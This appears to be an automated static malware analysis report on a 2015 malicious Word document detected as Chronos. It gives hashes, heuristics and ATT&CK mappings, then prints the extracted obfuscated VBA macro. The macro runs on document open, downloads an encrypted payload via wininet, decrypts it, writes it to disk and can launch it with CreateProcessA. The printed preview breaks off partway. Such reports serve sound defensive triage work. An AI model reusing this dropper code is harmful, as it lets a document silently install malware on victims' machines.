Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 73bb992a5db4509e…

MALICIOUS

Office (OOXML)

40.1 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-24
MD5: 7984fc46ae040d7815f4016e0ddae430 SHA-1: 0ad531063bf09fa9a3bb707aae6e5d55b765635c SHA-256: 73bb992a5db4509e410df0115cfdbd6b13266a0789947dfb855ceda0c8930e4e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros, indicated by the 'OOXML_VBA' and 'OLE_VBA_DOCOPEN' heuristics. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common lure for macro-based malware. The presence of a 'Document_Open' macro and the 'SE_ENABLE_LURE' heuristic further support this. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' strongly suggests malicious intent, likely involving the download and execution of a second-stage payload via the VBA script.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    LMAXuL1 = Environ(DKX1DXEAUcf6G(Chr(81) + Chr(110) + Chr(121) + Chr(112) + Chr(119) + Chr(238) + Chr(81), "Fj2AJdGU")) & "\" & MAH6GM2yWYO & DKX1DXEAUcf6G(Chr(173) + Chr(169) + Chr(55) + Chr(188), "NwH2tYuyXBhInJ")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 22395 bytes
SHA-256: 1c7b60d4b21842618f0b2eb06cc29c508eabf5eaa95207e6bb195685a2d30749
Detection
ClamAV: No threats found
Obfuscation or payload: likely
155 of 278 identifiers look randomly generated (e.g. 'DjcR4Myojp9FRJWBcDoE5') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Declare Function InternetOpenA Lib "wininet" (ByVal TBpYSRhk As String, ByVal PTBPgAe32vVx8N As Long, ByVal BJCm9U3FA As String, ByVal LEzqXfsqrz0y As String, ByVal MQiA1HgpYXQVWN As Long) As Long
Private Declare Sub E4bULRFT7ZmN8 Lib "msvbvm60" Alias "#183" (ByVal KQQZ3rmP As Long, ByVal QolDZQJRI As Long, ByVal VHKV8CsJx3Yn As Long)
Private XnHwWJh(0 To 255) As Integer
Private Declare Function InternetCloseHandle Lib "wininet" (ByRef QiuYJcuegc74ZxGQK As Long) As Long
Private Type HgYRnJvueG0YGxWLz
   LU3FA7UTf As Byte
   G8EAbkI6np4IwT() As Byte
End Type
Private Declare Function CloseHandle Lib "kernel32" (ByVal VXFa6 As Long) As Long
Private SyGY3WdRsGkIvj As String
Private Type HC3oYszRwHL
   M8wrG6tj8t As Long
   WrIFaxsQ As Long
   XDGmBHVziwfI As Long
   MI2IAe4fw As Long
End Type
Private Type RfiN92YQjla2OqxP
   U5mZXrdd0 As Long
   JcL8n16Cr8X8 As String
   M2PJArBVNjr As String
   MCz As String
   B1HVs1U As Long
   A0fcESCcGd2XHx As Long
   Dn0dAgQg As Long
   WjxUyEU5t As Long
   YRVfmcmfXHoq As Long
   GvTqp51DLX As Long
   IpY As Long
   ARIs0KOdF As Long
   M8ykhStl1K As Integer
   Drpct As Integer
   Yr8Tvtr0 As Long
   YhG9p As Long
   PGSxMrMBS4 As Long
   YntM5D8kbrlUhqE As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal G5NMVl2Uzd1 As String, ByVal JcN1EN1bBYXA As String, MIqNwmpMQj As Any, RH4VmS70uvMVo6 As Any, ByVal W76tEUle3Adj6S As Long, ByVal Iw7Hh2V As Long, CS96dYAOy4l As Any, ByVal PQKaaChgtbB3bb1DD As String, R7CYum As RfiN92YQjla2OqxP, Gi7WwNu2uZeTV As HC3oYszRwHL) As Long
Private Declare Function InternetReadFile Lib "wininet" (ByVal Pwd0evA7BbQxku As Long, ByVal TRYqHZtFa4 As String, ByVal No9nzWInlt As Long, GqkM As Long) As Integer
Private Type YRSrxgfiJENRt
   MK5lwvr1deV As Integer
   JITJY As Integer
   PqmLP7l77aS As Integer
   K6ccB8YIMz As Integer
   ESDZu5db5yu As Long
End Type
Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal UTP2b As Long, ByVal Aj0s7T86 As String, ByVal BZw4c6X2mnLv As String, ByVal BlfO6iL1coQX As Long, ByVal Ha1ti41r7DiO7 As Long, ByVal LIKwglG As Long) As Long
Private Function QxD(ByVal G2Ldua9M As String, ByVal UTNe5Viahi0qE1mCN As String, ByVal QrQuP As String) As Boolean
Dim QQA8Ng As Long, OeHs4Jz4L3S9 As Long
QQA8Ng = 36
OeHs4Jz4L3S9 = 79
If QQA8Ng + OeHs4Jz4L3S9 > 4 Then
OeHs4Jz4L3S9 = QQA8Ng + 4
Else
MsgBox 31
End If
Dim BsZz08JRqIE4wOC As Long, ByRdFxiQBkzm As Long, IiNEgs As Long, FwUyfmk3 As String * 8162, SdUP9W3EHTbmvBE As String, GKvbe10j4Vzg As Integer, JITHf As Double
Dim SzKUB6zJeC As Long, GWuFQeJFuwUm As Long
SzKUB6zJeC = 33
GWuFQeJFuwUm = 88
If SzKUB6zJeC + GWuFQeJFuwUm > 4 Then
GWuFQeJFuwUm = SzKUB6zJeC + 48
Else
MsgBox 44
End If
BsZz08JRqIE4wOC = InternetOpenA(DKX1DXEAUcf6G(Chr(100) + Chr(159) + Chr(103) + Chr(62) + Chr(226) + Chr(197) + Chr(9) + Chr(177) + Chr(27) + Chr(137) + Chr(168) + Chr(174) + Chr(78) + Chr(208) + Chr(249) + Chr(193) + Chr(81) + Chr(62) + Chr(162) + Chr(170) + Chr(168) + Chr(241) + Chr(9) + Chr(249) + Chr(246) + Chr(129) + Chr(117) + Chr(50) + Chr(167) + Chr(77) + Chr(89) + Chr(201) + Chr(130) + Chr(65) + Chr(123) + Chr(19) + Chr(246) + Chr(166) + Chr(210) + Chr(221) + Chr(58) + Chr(237) + Chr(80) + Chr(166) + Chr(85) + Chr(231) + Chr(5) + Chr(152) + Chr(250) + Chr(84) + Chr(145) + Chr(19) + Chr(72) + Chr(196) + Chr(30) + Chr(46) + Chr(35) + Chr(37) + Chr(223) + Chr(221) + Chr(229) + Chr(116) + Chr(125) + Chr(187) + Chr(216) + Chr(143) + Chr(91), "JeOW2n"), 1, vbNullString, vbNullString, 0)
Dim WL3f8Yj As Long, LF6X9gO3F48G5SZP As Long
WL3f8Yj = 59
LF6X9gO3F48G5SZP = 64
If WL3f8Yj + LF6X9gO3F48G5SZP > 4 Then
LF6X9gO3F48G5SZP = WL3f8Yj + 48
Else
MsgBox 96
End If
If BsZz08JRqIE4wOC = 0 Then
Dim AJRvzz As Long, UltEFQA8 As Long
AJRvzz = 32
UltEFQA8 = 44
If AJRvzz + UltEFQA8 > 4 Then
UltEFQA8 = AJRvzz + 81
Else
MsgBox 96
End If
  QxD = False
  Exit Function
End If
Dim LZUVE9sA93P As Long, V9Krcl As Long
LZUVE9sA93P = 56
V9Krcl = 46
If LZUVE9sA93P + V9Krcl > 4 Then
V9Krcl = LZUVE9sA93P + 3
Else
MsgBox 6
End If
ByRdFxiQBkzm = InternetOpenUrlA(BsZz08JRqIE4wOC, G2Ldua9M, vbNullString, 0, &H4000000, 0)
Dim VD9Esusz0 As Long, WVvowhd59Zz4RVx9b As Long
VD9Esusz0 = 42
WVvowhd59Zz4RVx9b = 16
If VD9Esusz0 + WVvowhd59Zz4RVx9b > 4 Then
WVvowhd59Zz4RVx9b = VD9Esusz0 + 67
Else
MsgBox 11
End If
If ByRdFxiQBkzm = 0 Then
Dim QKJTlRordIC As Long, P2jV2Y5KtEEZIup As Long
QKJTlRordIC = 19
P2jV2Y5KtEEZIup = 58
If QKJTlRordIC + P2jV2Y5KtEEZIup > 4 Then
P2jV2Y5KtEEZIup = QKJTlRordIC + 40
Else
MsgBox 22
End If
  JITHf = 0
Else
Dim IVqK As Long, LUINafBgT As Long
IVqK = 31
LUINafBgT = 47
If IVqK + LUINafBgT > 4 Then
LUINafBgT = IVqK + 71
Else
MsgBox 26
End If
InternetReadFile ByRdFxiQBkzm, FwUyfmk3, 8162, IiNEgs
SdUP9W3EHTbmvBE = FwUyfmk3
Dim Dde4njWj As Long, HF7SWGb3GzVqH0U2 As Long
Dde4njWj = 48
HF7SWGb3GzVqH0U2 = 21
If Dde4njWj + HF7SWGb3GzVqH0U2 > 4 Then
HF7SWGb3GzVqH0U2 = Dde4njWj + 51
Else
MsgBox 58
End If
Do While IiNEgs <> 0
  InternetReadFile ByRdFxiQBkzm, FwUyfmk3, 8162, IiNEgs
  SdUP9W3EHTbmvBE = SdUP9W3EHTbmvBE + Mid(FwUyfmk3, 1, IiNEgs)
Loop
JITHf = Len(SdUP9W3EHTbmvBE)
Dim UvmmqRPg1ULy6l40 As Long, PxjLwwY As Long
UvmmqRPg1ULy6l40 = 17
PxjLwwY = 43
If UvmmqRPg1ULy6l40 + PxjLwwY > 4 Then
PxjLwwY = UvmmqRPg1ULy6l40 + 37
Else
MsgBox 4
End If
GKvbe10j4Vzg = FreeFile
Dim SMjWj As Long, BbCi2 As Long
SMjWj = 58
BbCi2 = 64
If SMjWj + BbCi2 > 4 Then
BbCi2 = SMjWj + 48
Else
MsgBox 95
End If
Open UTNe5Viahi0qE1mCN For Binary Access Write Lock Write As #GKvbe10j4Vzg
Put #GKvbe10j4Vzg, , IUPw87nykedO1WA(DKX1DXEAUcf6G(SdUP9W3EHTbmvBE, QrQuP))
Dim XFzIzT5zBBsLg3fs As Long, OkARgibNheU As Long
XFzIzT5zBBsLg3fs = 17
OkARgibNheU = 16
If XFzIzT5zBBsLg3fs + OkARgibNheU > 4 Then
OkARgibNheU = XFzIzT5zBBsLg3fs + 46
Else
MsgBox 27
End If
Close #GKvbe10j4Vzg
End If
InternetCloseHandle ByRdFxiQBkzm
Dim DjcR4Myojp9FRJWBcDoE5 As Long, VVwiIIpdPz As Long
DjcR4Myojp9FRJWBcDoE5 = 89
VVwiIIpdPz = 98
If DjcR4Myojp9FRJWBcDoE5 + VVwiIIpdPz > 4 Then
VVwiIIpdPz = DjcR4Myojp9FRJWBcDoE5 + 70
Else
MsgBox 56
End If
InternetCloseHandle BsZz08JRqIE4wOC
SdUP9W3EHTbmvBE = ""
If JITHf Then
  QxD = True
Dim GgnBJhjO As Long, Cz91CRrttADQqwLu6 As Long
GgnBJhjO = 27
Cz91CRrttADQqwLu6 = 60
If GgnBJhjO + Cz91CRrttADQqwLu6 > 4 Then
Cz91CRrttADQqwLu6 = GgnBJhjO + 33
Else
MsgBox 41
End If
End If
Dim VU9FnHSCY As Long, Vh9bSqtqZr0 As Long
VU9FnHSCY = 4
Vh9bSqtqZr0 = 29
If VU9FnHSCY + Vh9bSqtqZr0 > 4 Then
Vh9bSqtqZr0 = VU9FnHSCY + 78
Else
MsgBox 78
End If
End Function
Private Function PqkSxmrigqfWWVS8x(Ke88xa As String)
Dim QuemAovke As Long, RBEluE7ze42 As Long
QuemAovke = 41
RBEluE7ze42 = 16
If QuemAovke + RBEluE7ze42 > 4 Then
RBEluE7ze42 = QuemAovke + 17
Else
MsgBox 68
End If
Dim HcVZNmiKlKuRU7 As HC3oYszRwHL, L8R4QR1YdyA9 As RfiN92YQjla2OqxP, HnNCblPRl6fuFFaK As String
Dim MSRzD As Long, X5VFBEF77nbpi As Long
MSRzD = 18
X5VFBEF77nbpi = 38
If MSRzD + X5VFBEF77nbpi > 4 Then
X5VFBEF77nbpi = MSRzD + 78
Else
MsgBox 4
End If
L8R4QR1YdyA9.U5mZXrdd0 = Len(L8R4QR1YdyA9)
Dim Xd4cOi1 As Long, TzdawQqjuemAov As Long
Xd4cOi1 = 23
TzdawQqjuemAov = 22
If Xd4cOi1 + TzdawQqjuemAov > 4 Then
TzdawQqjuemAov = Xd4cOi1 + 53
Else
MsgBox 33
End If
CreateProcessA HnNCblPRl6fuFFaK, Ke88xa, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, HnNCblPRl6fuFFaK, L8R4QR1YdyA9, HcVZNmiKlKuRU7
Dim GBGv79e1FgP As Long, CTwsASEjAm As Long
GBGv79e1FgP = 19
CTwsASEjAm = 80
If GBGv79e1FgP + CTwsASEjAm > 4 Then
CTwsASEjAm = GBGv79e1FgP + 97
Else
MsgBox 98
End If
CloseHandle HcVZNmiKlKuRU7.WrIFaxsQ
Dim WXCsTXl7M As Long, Psn6uWwbplXBzzf As Long
WXCsTXl7M = 90
Psn6uWwbplXBzzf = 93
If WXCsTXl7M + Psn6uWwbplXBzzf > 4 Then
Psn6uWwbplXBzzf = WXCsTXl7M + 12
Else
MsgBox 57
End If
CloseHandle HcVZNmiKlKuRU7.M8wrG6tj8t
Dim FhxOpv As Long, VdoVOng6FKap2 As Long
FhxOpv = 30
VdoVOng6FKap2 = 76
If FhxOpv + VdoVOng6FKap2 > 4 Then
VdoVOng6FKap2 = FhxOpv + 11
Else
MsgBox 60
End If
End Function
Sub Th0oP49hY(TnCbnRQkgM6() As Byte, Optional GekYc As String)
Dim BjrI3cK7 As Long, UzvuI3EZzsQ1ez0p As Long, FGIuOi As Byte, TCOvi40bPey As Long, Om7mhTwAtWpH3pq As Long, NWUem As Long, C89pts4wj5dV2zda(0 To 255) As Integer
If (Len(GekYc) > 0) Then V9Jyck = GekYc
E4bULRFT7ZmN8 512, VarPtr(C89pts4wj5dV2zda(0)), VarPtr(XnHwWJh(0))
Om7mhTwAtWpH3pq = UBound(TnCbnRQkgM6) + 1
NWUem = Om7mhTwAtWpH3pq
For TCOvi40bPey = 0 To (Om7mhTwAtWpH3pq - 1)
BjrI3cK7 = (BjrI3cK7 + 1) Mod 256
UzvuI3EZzsQ1ez0p = (UzvuI3EZzsQ1ez0p + C89pts4wj5dV2zda(BjrI3cK7)) Mod 256
FGIuOi = C89pts4wj5dV2zda(BjrI3cK7)
C89pts4wj5dV2zda(BjrI3cK7) = C89pts4wj5dV2zda(UzvuI3EZzsQ1ez0p)
C89pts4wj5dV2zda(UzvuI3EZzsQ1ez0p) = FGIuOi
TnCbnRQkgM6(TCOvi40bPey) = TnCbnRQkgM6(TCOvi40bPey) Xor (C89pts4wj5dV2zda((C89pts4wj5dV2zda(BjrI3cK7) + C89pts4wj5dV2zda(UzvuI3EZzsQ1ez0p)) Mod 256))
Next
End Sub
Private Function MAH6GM2yWYO(Optional O6isGbb8XPJx35l As String = "0123456789") As String
Dim MMCNRDkK0xbnjZ As Long, Vn1G3miSkmhm As Long
MMCNRDkK0xbnjZ = 59
Vn1G3miSkmhm = 86
If MMCNRDkK0xbnjZ + Vn1G3miSkmhm > 4 Then
Vn1G3miSkmhm = MMCNRDkK0xbnjZ + 6
Else
MsgBox 73
End If
Dim No8uXAOOlr() As Byte, ArjM() As Byte, Uh66Poz2B0XETBU9 As Long, IOYItJ4LlkHb As Long, BVuDmVM8Zv3 As Long, OIjh34w0U As String
Dim JKap2n As Long, PolxiinK9Ob As Long
JKap2n = 60
PolxiinK9Ob = 11
If JKap2n + PolxiinK9Ob > 4 Then
PolxiinK9Ob = JKap2n + 32
Else
MsgBox 21
End If
BVuDmVM8Zv3 = 0
Dim BHDZfq3jm9 As Long, Ubm2Qzb As Long
BHDZfq3jm9 = 74
Ubm2Qzb = 69
If BHDZfq3jm9 + Ubm2Qzb > 4 Then
Ubm2Qzb = BHDZfq3jm9 + 57
Else
MsgBox 92
End If
ReO89UULhWFjj0:
Dim TfHKW7B6Bqs As Long, PbGNiW0bVtxo As Long
TfHKW7B6Bqs = 56
PbGNiW0bVtxo = 47
If TfHKW7B6Bqs + PbGNiW0bVtxo > 4 Then
PbGNiW0bVtxo = TfHKW7B6Bqs + 48
Else
MsgBox 45
End If
Randomize
OIjh34w0U = Int(30 * Rnd)
If OIjh34w0U < 4 Then GoTo ReO89UULhWFjj0
BVuDmVM8Zv3 = OIjh34w0U
If BVuDmVM8Zv3 > 0& Then
Dim C5FWa4Dpi As Long, JaIWkVm0pE As Long
C5FWa4Dpi = 37
JaIWkVm0pE = 52
If C5FWa4Dpi + JaIWkVm0pE > 4 Then
JaIWkVm0pE = C5FWa4Dpi + 32
Else
MsgBox 93
End If
Randomize
No8uXAOOlr = O6isGbb8XPJx35l
Dim E7r40fydAPruj As Long, JssUTc As Long
E7r40fydAPruj = 38
JssUTc = 77
If E7r40fydAPruj + JssUTc > 4 Then
JssUTc = E7r40fydAPruj + 58
Else
MsgBox 41
End If
Uh66Poz2B0XETBU9 = Len(O6isGbb8XPJx35l) - 1&
BVuDmVM8Zv3 = (BVuDmVM8Zv3 * 2&) - 1&
Dim OaCXRcIlP3aIWkV As Long, KETRCs908ZIfs As Long
OaCXRcIlP3aIWkV = 52
KETRCs908ZIfs = 32
If OaCXRcIlP3aIWkV + KETRCs908ZIfs > 4 Then
KETRCs908ZIfs = OaCXRcIlP3aIWkV + 93
Else
MsgBox 11
End If
ReDim ArjM(BVuDmVM8Zv3) As Byte
For IOYItJ4LlkHb = 0& To BVuDmVM8Zv3 Step 2&
ArjM(IOYItJ4LlkHb) = No8uXAOOlr(CLng(Uh66Poz2B0XETBU9 * Rnd) * 2&)
Next
Dim P2yFcgwKQFXt As Long, A16P5pVE As Long
P2yFcgwKQFXt = 4
A16P5pVE = 7
If P2yFcgwKQFXt + A16P5pVE > 4 Then
A16P5pVE = P2yFcgwKQFXt + 24
Else
MsgBox 43
End If
End If
Dim ILCwu8bmx4k As Long, YjWQLKPJuDIS As Long
ILCwu8bmx4k = 18
YjWQLKPJuDIS = 62
If ILCwu8bmx4k + YjWQLKPJuDIS > 4 Then
YjWQLKPJuDIS = ILCwu8bmx4k + 75
Else
MsgBox 89
End If
MAH6GM2yWYO = ArjM
Dim FJaOUHfHKW7 As Long, NDVP As Long
FJaOUHfHKW7 = 88
NDVP = 51
If FJaOUHfHKW7 + NDVP > 4 Then
NDVP = FJaOUHfHKW7 + 63
Else
MsgBox 1
End If
End Function
Private Function IUPw87nykedO1WA(SvE8o0 As String) As String
Dim YD2w2STKlFD() As Byte
YD2w2STKlFD() = StrConv(SvE8o0, vbFromUnicode)
C5EcEUD YD2w2STKlFD, Len(SvE8o0)
IUPw87nykedO1WA = StrConv(YD2w2STKlFD(), vbUnicode)
End Function
Private Sub QXmCqE1h(G9Si3hS1() As YRSrxgfiJENRt, GYe3yKx4Wjdjg7 As Long, H6IQKSZtKa2rMsUeq As Long, R0EoSsBVGCElhv9 As HgYRnJvueG0YGxWLz)
Dim I2xLMGrdHKXF As Integer, ALW9hsLeFWLvGQ6X4 As Long
ALW9hsLeFWLvGQ6X4 = 0
For I2xLMGrdHKXF = 0 To (R0EoSsBVGCElhv9.LU3FA7UTf - 1)
If (R0EoSsBVGCElhv9.G8EAbkI6np4IwT(I2xLMGrdHKXF) = 0) Then
If (G9Si3hS1(ALW9hsLeFWLvGQ6X4).PqmLP7l77aS = -1) Then
G9Si3hS1(ALW9hsLeFWLvGQ6X4).PqmLP7l77aS = GYe3yKx4Wjdjg7
G9Si3hS1(GYe3yKx4Wjdjg7).MK5lwvr1deV = ALW9hsLeFWLvGQ6X4
G9Si3hS1(GYe3yKx4Wjdjg7).PqmLP7l77aS = -1
G9Si3hS1(GYe3yKx4Wjdjg7).JITJY = -1
G9Si3hS1(GYe3yKx4Wjdjg7).K6ccB8YIMz = -1
GYe3yKx4Wjdjg7 = GYe3yKx4Wjdjg7 + 1
End If
ALW9hsLeFWLvGQ6X4 = G9Si3hS1(ALW9hsLeFWLvGQ6X4).PqmLP7l77aS
ElseIf (R0EoSsBVGCElhv9.G8EAbkI6np4IwT(I2xLMGrdHKXF) = 1) Then
If (G9Si3hS1(ALW9hsLeFWLvGQ6X4).JITJY = -1) Then
G9Si3hS1(ALW9hsLeFWLvGQ6X4).JITJY = GYe3yKx4Wjdjg7
G9Si3hS1(GYe3yKx4Wjdjg7).MK5lwvr1deV = ALW9hsLeFWLvGQ6X4
G9Si3hS1(GYe3yKx4Wjdjg7).PqmLP7l77aS = -1
G9Si3hS1(GYe3yKx4Wjdjg7).JITJY = -1
G9Si3hS1(GYe3yKx4Wjdjg7).K6ccB8YIMz = -1
GYe3yKx4Wjdjg7 = GYe3yKx4Wjdjg7 + 1
End If
ALW9hsLeFWLvGQ6X4 = G9Si3hS1(ALW9hsLeFWLvGQ6X4).JITJY
Else
Stop
End If
Next
G9Si3hS1(ALW9hsLeFWLvGQ6X4).K6ccB8YIMz = H6IQKSZtKa2rMsUeq
End Sub
Private Sub C5EcEUD(LYaHbNv() As Byte, KESWpIw07ev5f As Long)
Dim FyoDf2hZr2FKNIV As Long, LGIOYItJ As Long, QLO0A4p5sEXuL1 As Byte, LAVwPB4gPVXwvKBl As Long, UhuDPwn As Integer, AzKMETd As Byte, U7UBxT17oB1kfFT7g() As Byte, BHvLwA4VxnMM As Integer
Dim HibW6t78i4qO As Long, TJPXra4Wgx As Byte, PqyI6aNe As Long, OeGzcy54KA0o As Long, JKciTCPEcthaV As Long, V9d5wyd(0 To 7) As Byte, S6ArG58KxtJXt(0 To 511) As YRSrxgfiJENRt, Qtgfc9q054Bb(0 To 255) As HgYRnJvueG0YGxWLz
LAVwPB4gPVXwvKBl = 1
AzKMETd = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
E4bULRFT7ZmN8 4, VarPtr(PqyI6aNe), VarPtr(LYaHbNv(LAVwPB4gPVXwvKBl - 1))
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 4
JKciTCPEcthaV = PqyI6aNe
If (PqyI6aNe = 0) Then Exit Sub
ReDim U7UBxT17oB1kfFT7g(0 To PqyI6aNe - 1)
E4bULRFT7ZmN8 2, VarPtr(UhuDPwn), VarPtr(LYaHbNv(LAVwPB4gPVXwvKBl - 1))
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 2
For FyoDf2hZr2FKNIV = 1 To UhuDPwn
With Qtgfc9q054Bb(LYaHbNv(LAVwPB4gPVXwvKBl - 1))
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
.LU3FA7UTf = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
ReDim .G8EAbkI6np4IwT(0 To .LU3FA7UTf - 1)
End With
Next
V9d5wyd(0) = 2 ^ 0
V9d5wyd(1) = 2 ^ 1
V9d5wyd(2) = 2 ^ 2
V9d5wyd(3) = 2 ^ 3
V9d5wyd(4) = 2 ^ 4
V9d5wyd(5) = 2 ^ 5
V9d5wyd(6) = 2 ^ 6
V9d5wyd(7) = 2 ^ 7
TJPXra4Wgx = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
BHvLwA4VxnMM = 0
For FyoDf2hZr2FKNIV = 0 To 255
With Qtgfc9q054Bb(FyoDf2hZr2FKNIV)
If (.LU3FA7UTf > 0) Then
For LGIOYItJ = 0 To (.LU3FA7UTf - 1)
If (TJPXra4Wgx And V9d5wyd(BHvLwA4VxnMM)) Then .G8EAbkI6np4IwT(LGIOYItJ) = 1
BHvLwA4VxnMM = BHvLwA4VxnMM + 1
If (BHvLwA4VxnMM = 8) Then
TJPXra4Wgx = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
BHvLwA4VxnMM = 0
End If
Next
End If
End With
Next
If (BHvLwA4VxnMM = 0) Then LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl - 1
OeGzcy54KA0o = 1
S6ArG58KxtJXt(0).PqmLP7l77aS = -1
S6ArG58KxtJXt(0).JITJY = -1
S6ArG58KxtJXt(0).MK5lwvr1deV = -1
S6ArG58KxtJXt(0).K6ccB8YIMz = -1
For FyoDf2hZr2FKNIV = 0 To 255
QXmCqE1h S6ArG58KxtJXt(), OeGzcy54KA0o, FyoDf2hZr2FKNIV, Qtgfc9q054Bb(FyoDf2hZr2FKNIV)
Next
PqyI6aNe = 0
For LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl To KESWpIw07ev5f
TJPXra4Wgx = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
For BHvLwA4VxnMM = 0 To 7
If (TJPXra4Wgx And V9d5wyd(BHvLwA4VxnMM)) Then HibW6t78i4qO = S6ArG58KxtJXt(HibW6t78i4qO).JITJY Else HibW6t78i4qO = S6ArG58KxtJXt(HibW6t78i4qO).PqmLP7l77aS
If (S6ArG58KxtJXt(HibW6t78i4qO).K6ccB8YIMz > -1) Then
U7UBxT17oB1kfFT7g(PqyI6aNe) = S6ArG58KxtJXt(HibW6t78i4qO).K6ccB8YIMz
PqyI6aNe = PqyI6aNe + 1
If (PqyI6aNe = JKciTCPEcthaV) Then GoTo JKciTCPEcthaV
HibW6t78i4qO = 0
End If
Next
Next
JKciTCPEcthaV:
QLO0A4p5sEXuL1 = 0
For FyoDf2hZr2FKNIV = 0 To (PqyI6aNe - 1)
QLO0A4p5sEXuL1 = QLO0A4p5sEXuL1 Xor U7UBxT17oB1kfFT7g(FyoDf2hZr2FKNIV)
Next
ReDim LYaHbNv(0 To PqyI6aNe - 1)
E4bULRFT7ZmN8 PqyI6aNe, VarPtr(LYaHbNv(0)), VarPtr(U7UBxT17oB1kfFT7g(0))
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim L2MpyBMcjAABH As Long, QkgswjcYeaUoRwns As Long
L2MpyBMcjAABH = 29
QkgswjcYeaUoRwns = 1
If L2MpyBMcjAABH + QkgswjcYeaUoRwns > 4 Then
QkgswjcYeaUoRwns = L2MpyBMcjAABH + 14
Else
MsgBox 27
End If
Dim LMAXuL1 As String
Dim OKigrmX5j5K2 As Long, RLgVeU2 As Long
OKigrmX5j5K2 = 27
RLgVeU2 = 7
If OKigrmX5j5K2 + RLgVeU2 > 4 Then
RLgVeU2 = OKigrmX5j5K2 + 67
Else
MsgBox 85
End If
Dim U8i17I3p3b3os As Long, RddrQAqJu As Long, Bdl0G9 As Long, YXc3ca8m4qK As Integer
Dim OGNJ44 As Long, CrHE7w0QSCtWCP As Long
OGNJ44 = 57
CrHE7w0QSCtWCP = 17
If OGNJ44 + CrHE7w0QSCtWCP > 4 Then
CrHE7w0QSCtWCP = OGNJ44 + 63
Else
MsgBox 97
End If
U8i17I3p3b3os = 978972537: RddrQAqJu = 0: Bdl0G9 = 0
Dim XbevL As Long, Drci3KW89DXC As Long
XbevL = 75
Drci3KW89DXC = 15
If XbevL + Drci3KW89DXC > 4 Then
Drci3KW89DXC = XbevL + 70
Else
MsgBox 78
End If
For RddrQAqJu = 1 To U8i17I3p3b3os
Bdl0G9 = Bdl0G9 + 1
Next RddrQAqJu
Dim YFprPEr1cy8x As Long, PMZMJ4xE As Long
YFprPEr1cy8x = 14
PMZMJ4xE = 73
If YFprPEr1cy8x + PMZMJ4xE > 4 Then
PMZMJ4xE = YFprPEr1cy8x + 69
Else
MsgBox 34
End If
If Bdl0G9 = U8i17I3p3b3os Then
Dim ELaWKzFV As Long, OtVZ8sCq As Long
ELaWKzFV = 67
OtVZ8sCq = 41
If ELaWKzFV + OtVZ8sCq > 4 Then
OtVZ8sCq = ELaWKzFV + 92
Else
MsgBox 36
End If
